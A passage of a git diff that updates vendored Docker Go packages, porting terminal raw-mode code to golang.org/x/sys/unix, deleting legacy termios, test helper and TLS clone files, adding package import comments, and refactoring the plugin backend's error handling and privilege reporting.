 // mode and returns the previous state of the terminal so that it can be
 // restored.
 func MakeRaw(fd uintptr) (*State, error) {
-	var oldState State
-	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, getTermios, uintptr(unsafe.Pointer(&oldState.termios))); err != 0 {
+	termios, err := unix.IoctlGetTermios(int(fd), getTermios)
+	if err != nil {
 		return nil, err
 	}
 
-	newState := oldState.termios
+	var oldState State
+	oldState.termios = Termios(*termios)
 
-	newState.Iflag &^= (syscall.IGNBRK | syscall.BRKINT | syscall.PARMRK | syscall.ISTRIP | syscall.INLCR | syscall.IGNCR | syscall.ICRNL | syscall.IXON)
-	newState.Oflag &^= syscall.OPOST
-	newState.Lflag &^= (syscall.ECHO | syscall.ECHONL | syscall.ICANON | syscall.ISIG | syscall.IEXTEN)
-	newState.Cflag &^= (syscall.CSIZE | syscall.PARENB)
-	newState.Cflag |= syscall.CS8
+	termios.Iflag &^= (unix.IGNBRK | unix.BRKINT | unix.PARMRK | unix.ISTRIP | unix.INLCR | unix.IGNCR | unix.ICRNL | unix.IXON)
+	termios.Oflag &^= unix.OPOST
+	termios.Lflag &^= (unix.ECHO | unix.ECHONL | unix.ICANON | unix.ISIG | unix.IEXTEN)
+	termios.Cflag &^= (unix.CSIZE | unix.PARENB)
+	termios.Cflag |= unix.CS8
+	termios.Cc[unix.VMIN] = 1
+	termios.Cc[unix.VTIME] = 0
 
-	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(&newState))); err != 0 {
+	if err := unix.IoctlSetTermios(int(fd), setTermios, termios); err != nil {
 		return nil, err
 	}
 	return &oldState, nil
diff --git a/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go b/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go
deleted file mode 100644
index ed843ad69c..0000000000
--- a/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go
+++ /dev/null
@@ -1,69 +0,0 @@
-package term
-
-import (
-	"syscall"
-	"unsafe"
-)
-
-const (
-	getTermios = syscall.TIOCGETA
-	setTermios = syscall.TIOCSETA
-)
-
-// Termios magic numbers, passthrough to the ones defined in syscall.
-const (
-	IGNBRK = syscall.IGNBRK
-	PARMRK = syscall.PARMRK
-	INLCR  = syscall.INLCR
-	IGNCR  = syscall.IGNCR
-	ECHONL = syscall.ECHONL
-	CSIZE  = syscall.CSIZE
-	ICRNL  = syscall.ICRNL
-	ISTRIP = syscall.ISTRIP
-	PARENB = syscall.PARENB
-	ECHO   = syscall.ECHO
-	ICANON = syscall.ICANON
-	ISIG   = syscall.ISIG
-	IXON   = syscall.IXON
-	BRKINT = syscall.BRKINT
-	INPCK  = syscall.INPCK
-	OPOST  = syscall.OPOST
-	CS8    = syscall.CS8
-	IEXTEN = syscall.IEXTEN
-)
-
-// Termios is the Unix API for terminal I/O.
-type Termios struct {
-	Iflag  uint32
-	Oflag  uint32
-	Cflag  uint32
-	Lflag  uint32
-	Cc     [20]byte
-	Ispeed uint32
-	Ospeed uint32
-}
-
-// MakeRaw put the terminal connected to the given file descriptor into raw
-// mode and returns the previous state of the terminal so that it can be
-// restored.
-func MakeRaw(fd uintptr) (*State, error) {
-	var oldState State
-	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 {
-		return nil, err
-	}
-
-	newState := oldState.termios
-	newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON)
-	newState.Oflag &^= OPOST
-	newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN)
-	newState.Cflag &^= (CSIZE | PARENB)
-	newState.Cflag |= CS8
-	newState.Cc[syscall.VMIN] = 1
-	newState.Cc[syscall.VTIME] = 0
-
-	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 {
-		return nil, err
-	}
-
-	return &oldState, nil
-}
diff --git a/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go b/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go
index cb0b88356d..1d7c452cc8 100644
--- a/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go
+++ b/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go
@@ -1,6 +1,6 @@
 // +build windows
 
-package windows
+package windowsconsole // import "github.com/docker/docker/pkg/term/windows"
 
 import (
 	"bytes"
diff --git a/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go b/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go
index a3ce5697d9..7799a03fc5 100644
--- a/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go
+++ b/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go
@@ -1,6 +1,6 @@
 // +build windows
 
-package windows
+package windowsconsole // import "github.com/docker/docker/pkg/term/windows"
 
 import (
 	"io"
diff --git a/vendor/github.com/docker/docker/pkg/term/windows/console.go b/vendor/github.com/docker/docker/pkg/term/windows/console.go
index ca5c3b2e53..5274019758 100644
--- a/vendor/github.com/docker/docker/pkg/term/windows/console.go
+++ b/vendor/github.com/docker/docker/pkg/term/windows/console.go
@@ -1,6 +1,6 @@
 // +build windows
 
-package windows
+package windowsconsole // import "github.com/docker/docker/pkg/term/windows"
 
 import (
 	"os"
diff --git a/vendor/github.com/docker/docker/pkg/term/windows/windows.go b/vendor/github.com/docker/docker/pkg/term/windows/windows.go
index ce4cb5990e..3e5593ca6a 100644
--- a/vendor/github.com/docker/docker/pkg/term/windows/windows.go
+++ b/vendor/github.com/docker/docker/pkg/term/windows/windows.go
@@ -2,15 +2,15 @@
 // When asked for the set of standard streams (e.g., stdin, stdout, stderr), the code will create
 // and return pseudo-streams that convert ANSI sequences to / from Windows Console API calls.
 
-package windows
+package windowsconsole // import "github.com/docker/docker/pkg/term/windows"
 
 import (
 	"io/ioutil"
 	"os"
 	"sync"
 
-	ansiterm "github.com/Azure/go-ansiterm"
-	"github.com/Sirupsen/logrus"
+	"github.com/Azure/go-ansiterm"
+	"github.com/sirupsen/logrus"
 )
 
 var logger *logrus.Logger
diff --git a/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go b/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go
index 52aeab54ec..80cda601fa 100644
--- a/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go
+++ b/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go
@@ -1,3 +1,3 @@
 // This file is necessary to pass the Docker tests.
 
-package windows
+package windowsconsole // import "github.com/docker/docker/pkg/term/windows"
diff --git a/vendor/github.com/docker/docker/pkg/term/winsize.go b/vendor/github.com/docker/docker/pkg/term/winsize.go
new file mode 100644
index 0000000000..a19663ad83
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/winsize.go
@@ -0,0 +1,20 @@
+// +build !windows
+
+package term // import "github.com/docker/docker/pkg/term"
+
+import (
+	"golang.org/x/sys/unix"
+)
+
+// GetWinsize returns the window size based on the specified file descriptor.
+func GetWinsize(fd uintptr) (*Winsize, error) {
+	uws, err := unix.IoctlGetWinsize(int(fd), unix.TIOCGWINSZ)
+	ws := &Winsize{Height: uws.Row, Width: uws.Col, x: uws.Xpixel, y: uws.Ypixel}
+	return ws, err
+}
+
+// SetWinsize tries to set the specified window size for the specified file descriptor.
+func SetWinsize(fd uintptr, ws *Winsize) error {
+	uws := &unix.Winsize{Row: ws.Height, Col: ws.Width, Xpixel: ws.x, Ypixel: ws.y}
+	return unix.IoctlSetWinsize(int(fd), unix.TIOCSWINSZ, uws)
+}
diff --git a/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go b/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go
deleted file mode 100644
index 6da8518a5e..0000000000
--- a/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go
+++ /dev/null
@@ -1,97 +0,0 @@
-// Package assert contains functions for making assertions in unit tests
-package assert
-
-import (
-	"fmt"
-	"path/filepath"
-	"reflect"
-	"runtime"
-	"strings"
-
-	"github.com/davecgh/go-spew/spew"
-)
-
-// TestingT is an interface which defines the methods of testing.T that are
-// required by this package
-type TestingT interface {
-	Fatalf(string, ...interface{})
-}
-
-// Equal compare the actual value to the expected value and fails the test if
-// they are not equal.
-func Equal(t TestingT, actual, expected interface{}) {
-	if expected != actual {
-		fatal(t, "Expected '%v' (%T) got '%v' (%T)", expected, expected, actual, actual)
-	}
-}
-
-//EqualStringSlice compares two slices and fails the test if they do not contain
-// the same items.
-func EqualStringSlice(t TestingT, actual, expected []string) {
-	if len(actual) != len(expected) {
-		fatal(t, "Expected (length %d): %q\nActual (length %d): %q",
-			len(expected), expected, len(actual), actual)
-	}
-	for i, item := range actual {
-		if item != expected[i] {
-			fatal(t, "Slices differ at element %d, expected %q got %q",
-				i, expected[i], item)
-		}
-	}
-}
-
-// NilError asserts that the error is nil, otherwise it fails the test.
-func NilError(t TestingT, err error) {
-	if err != nil {
-		fatal(t, "Expected no error, got: %s", err.Error())
-	}
-}
-
-// DeepEqual compare the actual value to the expected value and fails the test if
-// they are not "deeply equal".
-func DeepEqual(t TestingT, actual, expected interface{}) {
-	if !reflect.DeepEqual(actual, expected) {
-		fatal(t, "Expected (%T):\n%v\n\ngot (%T):\n%s\n",
-			expected, spew.Sdump(expected), actual, spew.Sdump(actual))
-	}
-}
-
-// Error asserts that error is not nil, and contains the expected text,
-// otherwise it fails the test.
-func Error(t TestingT, err error, contains string) {
-	if err == nil {
-		fatal(t, "Expected an error, but error was nil")
-	}
-
-	if !strings.Contains(err.Error(), contains) {
-		fatal(t, "Expected error to contain '%s', got '%s'", contains, err.Error())
-	}
-}
-
-// Contains asserts that the string contains a substring, otherwise it fails the
-// test.
-func Contains(t TestingT, actual, contains string) {
-	if !strings.Contains(actual, contains) {
-		fatal(t, "Expected '%s' to contain '%s'", actual, contains)
-	}
-}
-
-// NotNil fails the test if the object is nil
-func NotNil(t TestingT, obj interface{}) {
-	if obj == nil {
-		fatal(t, "Expected non-nil value.")
-	}
-}
-
-func fatal(t TestingT, format string, args ...interface{}) {
-	t.Fatalf(errorSource()+format, args...)
-}
-
-// See testing.decorate()
-func errorSource() string {
-	_, filename, line, ok := runtime.Caller(3)
-	if !ok {
-		return ""
-	}
-	return fmt.Sprintf("%s:%d: ", filepath.Base(filename), line)
-}
diff --git a/vendor/github.com/docker/docker/pkg/testutil/pkg.go b/vendor/github.com/docker/docker/pkg/testutil/pkg.go
deleted file mode 100644
index 110b2e6a79..0000000000
--- a/vendor/github.com/docker/docker/pkg/testutil/pkg.go
+++ /dev/null
@@ -1 +0,0 @@
-package testutil
diff --git a/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go b/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go
deleted file mode 100644
index 0e09d99dae..0000000000
--- a/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go
+++ /dev/null
@@ -1,36 +0,0 @@
-package tempfile
-
-import (
-	"io/ioutil"
-	"os"
-
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-// TempFile is a temporary file that can be used with unit tests. TempFile
-// reduces the boilerplate setup required in each test case by handling
-// setup errors.
-type TempFile struct {
-	File *os.File
-}
-
-// NewTempFile returns a new temp file with contents
-func NewTempFile(t assert.TestingT, prefix string, content string) *TempFile {
-	file, err := ioutil.TempFile("", prefix+"-")
-	assert.NilError(t, err)
-
-	_, err = file.Write([]byte(content))
-	assert.NilError(t, err)
-	file.Close()
-	return &TempFile{File: file}
-}
-
-// Name returns the filename
-func (f *TempFile) Name() string {
-	return f.File.Name()
-}
-
-// Remove removes the file
-func (f *TempFile) Remove() {
-	os.Remove(f.Name())
-}
diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go
deleted file mode 100644
index e4dec3a5d1..0000000000
--- a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go
+++ /dev/null
@@ -1,11 +0,0 @@
-// +build go1.8
-
-package tlsconfig
-
-import "crypto/tls"
-
-// Clone returns a clone of tls.Config. This function is provided for
-// compatibility for go1.7 that doesn't include this method in stdlib.
-func Clone(c *tls.Config) *tls.Config {
-	return c.Clone()
-}
diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go
deleted file mode 100644
index 0b816650ec..0000000000
--- a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go
+++ /dev/null
@@ -1,31 +0,0 @@
-// +build go1.6,!go1.7
-
-package tlsconfig
-
-import "crypto/tls"
-
-// Clone returns a clone of tls.Config. This function is provided for
-// compatibility for go1.6 that doesn't include this method in stdlib.
-func Clone(c *tls.Config) *tls.Config {
-	return &tls.Config{
-		Rand:                     c.Rand,
-		Time:                     c.Time,
-		Certificates:             c.Certificates,
-		NameToCertificate:        c.NameToCertificate,
-		GetCertificate:           c.GetCertificate,
-		RootCAs:                  c.RootCAs,
-		NextProtos:               c.NextProtos,
-		ServerName:               c.ServerName,
-		ClientAuth:               c.ClientAuth,
-		ClientCAs:                c.ClientCAs,
-		InsecureSkipVerify:       c.InsecureSkipVerify,
-		CipherSuites:             c.CipherSuites,
-		PreferServerCipherSuites: c.PreferServerCipherSuites,
-		SessionTicketsDisabled:   c.SessionTicketsDisabled,
-		SessionTicketKey:         c.SessionTicketKey,
-		ClientSessionCache:       c.ClientSessionCache,
-		MinVersion:               c.MinVersion,
-		MaxVersion:               c.MaxVersion,
-		CurvePreferences:         c.CurvePreferences,
-	}
-}
diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go
deleted file mode 100644
index 0d5b448fec..0000000000
--- a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go
+++ /dev/null
@@ -1,33 +0,0 @@
-// +build go1.7,!go1.8
-
-package tlsconfig
-
-import "crypto/tls"
-
-// Clone returns a clone of tls.Config. This function is provided for
-// compatibility for go1.7 that doesn't include this method in stdlib.
-func Clone(c *tls.Config) *tls.Config {
-	return &tls.Config{
-		Rand:                        c.Rand,
-		Time:                        c.Time,
-		Certificates:                c.Certificates,
-		NameToCertificate:           c.NameToCertificate,
-		GetCertificate:              c.GetCertificate,
-		RootCAs:                     c.RootCAs,
-		NextProtos:                  c.NextProtos,
-		ServerName:                  c.ServerName,
-		ClientAuth:                  c.ClientAuth,
-		ClientCAs:                   c.ClientCAs,
-		InsecureSkipVerify:          c.InsecureSkipVerify,
-		CipherSuites:                c.CipherSuites,
-		PreferServerCipherSuites:    c.PreferServerCipherSuites,
-		SessionTicketsDisabled:      c.SessionTicketsDisabled,
-		SessionTicketKey:            c.SessionTicketKey,
-		ClientSessionCache:          c.ClientSessionCache,
-		MinVersion:                  c.MinVersion,
-		MaxVersion:                  c.MaxVersion,
-		CurvePreferences:            c.CurvePreferences,
-		DynamicRecordSizingDisabled: c.DynamicRecordSizingDisabled,
-		Renegotiation:               c.Renegotiation,
-	}
-}
diff --git a/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go b/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go
index 02610b8b7e..d5c840cf13 100644
--- a/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go
+++ b/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go
@@ -1,7 +1,7 @@
 // Package truncindex provides a general 'index tree', used by Docker
 // in order to be able to reference containers by only a few unambiguous
 // characters of their id.
-package truncindex
+package truncindex // import "github.com/docker/docker/pkg/truncindex"
 
 import (
 	"errors"
@@ -77,10 +77,7 @@ func (idx *TruncIndex) addID(id string) error {
 func (idx *TruncIndex) Add(id string) error {
 	idx.Lock()
 	defer idx.Unlock()
-	if err := idx.addID(id); err != nil {
-		return err
-	}
-	return nil
+	return idx.addID(id)
 }
 
 // Delete removes an ID from the TruncIndex. If there are multiple IDs
@@ -128,8 +125,13 @@ func (idx *TruncIndex) Get(s string) (string, error) {
 	return "", ErrNotExist
 }
 
-// Iterate iterates over all stored IDs, and passes each of them to the given handler.
+// Iterate iterates over all stored IDs and passes each of them to the given
+// handler. Take care that the handler method does not call any public
+// method on truncindex as the internal locking is not reentrant/recursive
+// and will result in deadlock.
 func (idx *TruncIndex) Iterate(handler func(id string)) {
+	idx.Lock()
+	defer idx.Unlock()
 	idx.trie.Visit(func(prefix patricia.Prefix, item patricia.Item) error {
 		handler(string(prefix))
 		return nil
diff --git a/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go b/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go
index 8197baf7d4..e259017982 100644
--- a/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go
+++ b/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go
@@ -1,15 +1,16 @@
-package truncindex
+package truncindex // import "github.com/docker/docker/pkg/truncindex"
 
 import (
 	"math/rand"
 	"testing"
+	"time"
 
 	"github.com/docker/docker/pkg/stringid"
 )
 
 // Test the behavior of TruncIndex, an index for querying IDs from a non-conflicting prefix.
 func TestTruncIndex(t *testing.T) {
-	ids := []string{}
+	var ids []string
 	index := NewTruncIndex(ids)
 	// Get on an empty index
 	if _, err := index.Get("foobar"); err == nil {
@@ -98,6 +99,7 @@ func TestTruncIndex(t *testing.T) {
 	assertIndexGet(t, index, id, id, false)
 
 	assertIndexIterate(t)
+	assertIndexIterateDoNotPanic(t)
 }
 
 func assertIndexIterate(t *testing.T) {
@@ -121,6 +123,28 @@ func assertIndexIterate(t *testing.T) {
 	})
 }
 
+func assertIndexIterateDoNotPanic(t *testing.T) {
+	ids := []string{
+		"19b36c2c326ccc11e726eee6ee78a0baf166ef96",
+		"28b36c2c326ccc11e726eee6ee78a0baf166ef96",
+	}
+
+	index := NewTruncIndex(ids)
+	iterationStarted := make(chan bool, 1)
+
+	go func() {
+		<-iterationStarted
+		index.Delete("19b36c2c326ccc11e726eee6ee78a0baf166ef96")
+	}()
+
+	index.Iterate(func(targetId string) {
+		if targetId == "19b36c2c326ccc11e726eee6ee78a0baf166ef96" {
+			iterationStarted <- true
+			time.Sleep(100 * time.Millisecond)
+		}
+	})
+}
+
 func assertIndexGet(t *testing.T, index *TruncIndex, input, expectedResult string, expectError bool) {
 	if result, err := index.Get(input); err != nil && !expectError {
 		t.Fatalf("Unexpected error getting '%s': %s", input, err)
diff --git a/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go b/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go
index 44152873b1..9cf348c723 100644
--- a/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go
+++ b/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go
@@ -1,6 +1,6 @@
 // Package urlutil provides helper function to check urls kind.
 // It supports http urls, git urls and transport url (tcp://, …)
-package urlutil
+package urlutil // import "github.com/docker/docker/pkg/urlutil"
 
 import (
 	"regexp"
@@ -9,7 +9,15 @@ import (
 
 var (
 	validPrefixes = map[string][]string{
-		"url":       {"http://", "https://"},
+		"url": {"http://", "https://"},
+
+		// The github.com/ prefix is a special case used to treat context-paths
+		// starting with `github.com` as a git URL if the given path does not
+		// exist locally. The "github.com/" prefix is kept for backward compatibility,
+		// and is a legacy feature.
+		//
+		// Going forward, no additional prefixes should be added, and users should
+		// be encouraged to use explicit URLs (https://github.com/user/repo.git) instead.
 		"git":       {"git://", "github.com/", "git@"},
 		"transport": {"tcp://", "tcp+tls://", "udp://", "unix://", "unixgram://"},
 	}
@@ -29,12 +37,6 @@ func IsGitURL(str string) bool {
 	return checkURL(str, "git")
 }
 
-// IsGitTransport returns true if the provided str is a git transport by inspecting
-// the prefix of the string for known protocols used in git.
-func IsGitTransport(str string) bool {
-	return IsURL(str) || strings.HasPrefix(str, "git://") || strings.HasPrefix(str, "git@")
-}
-
 // IsTransportURL returns true if the provided str is a transport (tcp, tcp+tls, udp, unix) URL.
 func IsTransportURL(str string) bool {
 	return checkURL(str, "transport")
diff --git a/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go b/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go
index 75eb464fe5..6660368316 100644
--- a/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go
+++ b/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go
@@ -1,4 +1,4 @@
-package urlutil
+package urlutil // import "github.com/docker/docker/pkg/urlutil"
 
 import "testing"
 
@@ -27,35 +27,21 @@ var (
 	}
 )
 
-func TestValidGitTransport(t *testing.T) {
-	for _, url := range gitUrls {
-		if IsGitTransport(url) == false {
-			t.Fatalf("%q should be detected as valid Git prefix", url)
-		}
-	}
-
-	for _, url := range incompleteGitUrls {
-		if IsGitTransport(url) == true {
-			t.Fatalf("%q should not be detected as valid Git prefix", url)
-		}
-	}
-}
-
 func TestIsGIT(t *testing.T) {
 	for _, url := range gitUrls {
-		if IsGitURL(url) == false {
+		if !IsGitURL(url) {
 			t.Fatalf("%q should be detected as valid Git url", url)
 		}
 	}
 
 	for _, url := range incompleteGitUrls {
-		if IsGitURL(url) == false {
+		if !IsGitURL(url) {
 			t.Fatalf("%q should be detected as valid Git url", url)
 		}
 	}
 
 	for _, url := range invalidGitUrls {
-		if IsGitURL(url) == true {
+		if IsGitURL(url) {
 			t.Fatalf("%q should not be detected as valid Git prefix", url)
 		}
 	}
@@ -63,7 +49,7 @@ func TestIsGIT(t *testing.T) {
 
 func TestIsTransport(t *testing.T) {
 	for _, url := range transportUrls {
-		if IsTransportURL(url) == false {
+		if !IsTransportURL(url) {
 			t.Fatalf("%q should be detected as valid Transport url", url)
 		}
 	}
diff --git a/vendor/github.com/docker/docker/pkg/useragent/useragent.go b/vendor/github.com/docker/docker/pkg/useragent/useragent.go
index 1137db51b8..22db82129b 100644
--- a/vendor/github.com/docker/docker/pkg/useragent/useragent.go
+++ b/vendor/github.com/docker/docker/pkg/useragent/useragent.go
@@ -1,6 +1,6 @@
 // Package useragent provides helper functions to pack
 // version information into a single User-Agent header.
-package useragent
+package useragent // import "github.com/docker/docker/pkg/useragent"
 
 import (
 	"strings"
diff --git a/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go b/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go
index 0ad7243a6d..76868dc852 100644
--- a/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go
+++ b/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go
@@ -1,4 +1,4 @@
-package useragent
+package useragent // import "github.com/docker/docker/pkg/useragent"
 
 import "testing"
 
diff --git a/vendor/github.com/docker/docker/plugin/backend_linux.go b/vendor/github.com/docker/docker/plugin/backend_linux.go
index 33200d8efa..044e14b0cb 100644
--- a/vendor/github.com/docker/docker/plugin/backend_linux.go
+++ b/vendor/github.com/docker/docker/plugin/backend_linux.go
@@ -1,40 +1,49 @@
-// +build linux
-
-package plugin
+package plugin // import "github.com/docker/docker/plugin"
 
 import (
 	"archive/tar"
 	"compress/gzip"
+	"context"
 	"encoding/json"
-	"fmt"
 	"io"
 	"io/ioutil"
 	"net/http"
 	"os"
 	"path"
 	"path/filepath"
-	"sort"
+	"runtime"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
 	"github.com/docker/distribution/manifest/schema2"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/distribution"
 	progressutils "github.com/docker/docker/distribution/utils"
 	"github.com/docker/docker/distribution/xfer"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/authorization"
 	"github.com/docker/docker/pkg/chrootarchive"
 	"github.com/docker/docker/pkg/mount"
 	"github.com/docker/docker/pkg/pools"
 	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/pkg/system"
 	"github.com/docker/docker/plugin/v2"
-	"github.com/docker/docker/reference"
+	refstore "github.com/docker/docker/reference"
+	"github.com/opencontainers/go-digest"
+	specs "github.com/opencontainers/image-spec/specs-go/v1"
 	"github.com/pkg/errors"
-	"golang.org/x/net/context"
+	"github.com/sirupsen/logrus"
 )
 
+var acceptedPluginFilterTags = map[string]bool{
+	"enabled":    true,
+	"capability": true,
+}
+
 // Disable deactivates a plugin. This means resources (volumes, networks) cant use them.
 func (pm *Manager) Disable(refOrID string, config *types.PluginDisableConfig) error {
 	p, err := pm.config.Store.GetV2Plugin(refOrID)
@@ -46,12 +55,19 @@ func (pm *Manager) Disable(refOrID string, config *types.PluginDisableConfig) er
 	pm.mu.RUnlock()
 
 	if !config.ForceDisable && p.GetRefCount() > 0 {
-		return fmt.Errorf("plugin %s is in use", p.Name())
+		return errors.WithStack(inUseError(p.Name()))
+	}
+
+	for _, typ := range p.GetTypes() {
+		if typ.Capability == authorization.AuthZApiImplements {
+			pm.config.AuthzMiddleware.RemovePlugin(p.Name())
+		}
 	}
 
 	if err := pm.disable(p, c); err != nil {
 		return err
 	}
+	pm.publisher.Publish(EventDisable{Plugin: p.PluginObj})
 	pm.config.LogPluginEvent(p.GetID(), refOrID, "disable")
 	return nil
 }
@@ -67,6 +83,7 @@ func (pm *Manager) Enable(refOrID string, config *types.PluginEnableConfig) erro
 	if err := pm.enable(p, c, false); err != nil {
 		return err
 	}
+	pm.publisher.Publish(EventEnable{Plugin: p.PluginObj})
 	pm.config.LogPluginEvent(p.GetID(), refOrID, "enable")
 	return nil
 }
@@ -125,7 +142,7 @@ func (s *tempConfigStore) Put(c []byte) (digest.Digest, error) {
 
 func (s *tempConfigStore) Get(d digest.Digest) ([]byte, error) {
 	if d != s.configDigest {
-		return nil, digest.ErrDigestNotFound
+		return nil, errNotFound("digest not found")
 	}
 	return s.config, nil
 }
@@ -134,7 +151,12 @@ func (s *tempConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) {
 	return configToRootFS(c)
 }
 
-func computePrivileges(c types.PluginConfig) (types.PluginPrivileges, error) {
+func (s *tempConfigStore) PlatformFromConfig(c []byte) (*specs.Platform, error) {
+	// TODO: LCOW/Plugins. This will need revisiting. For now use the runtime OS
+	return &specs.Platform{OS: runtime.GOOS}, nil
+}
+
+func computePrivileges(c types.PluginConfig) types.PluginPrivileges {
 	var privileges types.PluginPrivileges
 	if c.Network.Type != "null" && c.Network.Type != "bridge" && c.Network.Type != "" {
 		privileges = append(privileges, types.PluginPrivilege{
@@ -143,6 +165,20 @@ func computePrivileges(c types.PluginConfig) (types.PluginPrivileges, error) {
 			Value:       []string{c.Network.Type},
 		})
 	}
+	if c.IpcHost {
+		privileges = append(privileges, types.PluginPrivilege{
+			Name:        "host ipc namespace",
+			Description: "allow access to host ipc namespace",
+			Value:       []string{"true"},
+		})
+	}
+	if c.PidHost {
+		privileges = append(privileges, types.PluginPrivilege{
+			Name:        "host pid namespace",
+			Description: "allow access to host pid namespace",
+			Value:       []string{"true"},
+		})
+	}
 	for _, mount := range c.Mounts {
 		if mount.Source != nil {
 			privileges = append(privileges, types.PluginPrivilege{
@@ -176,7 +212,7 @@ func computePrivileges(c types.PluginConfig) (types.PluginPrivileges, error) {
 		})
 	}
 
-	return privileges, nil
+	return privileges
 }
 
 // Privileges pulls a plugin config and computes the privileges required to install it.
@@ -205,34 +241,35 @@ func (pm *Manager) Privileges(ctx context.Context, ref reference.Named, metaHead
 	}
 	var config types.PluginConfig
 	if err := json.Unmarshal(cs.config, &config); err != nil {
-		return nil, err
+		return nil, errdefs.System(err)
 	}
 
-	return computePrivileges(config)
+	return computePrivileges(config), nil
 }
 
 // Upgrade upgrades a plugin
 func (pm *Manager) Upgrade(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer) (err error) {
 	p, err := pm.config.Store.GetV2Plugin(name)
 	if err != nil {
-		return errors.Wrap(err, "plugin must be installed before upgrading")
+		return err
 	}
 
 	if p.IsEnabled() {
-		return fmt.Errorf("plugin must be disabled before upgrading")
+		return errors.Wrap(enabledError(p.Name()), "plugin must be disabled before upgrading")
 	}
 
 	pm.muGC.RLock()
 	defer pm.muGC.RUnlock()
 
 	// revalidate because Pull is public
-	nameref, err := reference.ParseNamed(name)
-	if err != nil {
-		return errors.Wrapf(err, "failed to parse %q", name)
+	if _, err := reference.ParseNormalizedNamed(name); err != nil {
+		return errors.Wrapf(errdefs.InvalidParameter(err), "failed to parse %q", name)
 	}
-	name = reference.WithDefaultTag(nameref).String()
 
 	tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs")
+	if err != nil {
+		return errors.Wrap(errdefs.System(err), "error preparing upgrade")
+	}
 	defer os.RemoveAll(tmpRootFSDir)
 
 	dm := &downloadManager{
@@ -266,22 +303,25 @@ func (pm *Manager) Upgrade(ctx context.Context, ref reference.Named, name string
 }
 
 // Pull pulls a plugin, check if the correct privileges are provided and install the plugin.
-func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer) (err error) {
+func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer, opts ...CreateOpt) (err error) {
 	pm.muGC.RLock()
 	defer pm.muGC.RUnlock()
 
 	// revalidate because Pull is public
-	nameref, err := reference.ParseNamed(name)
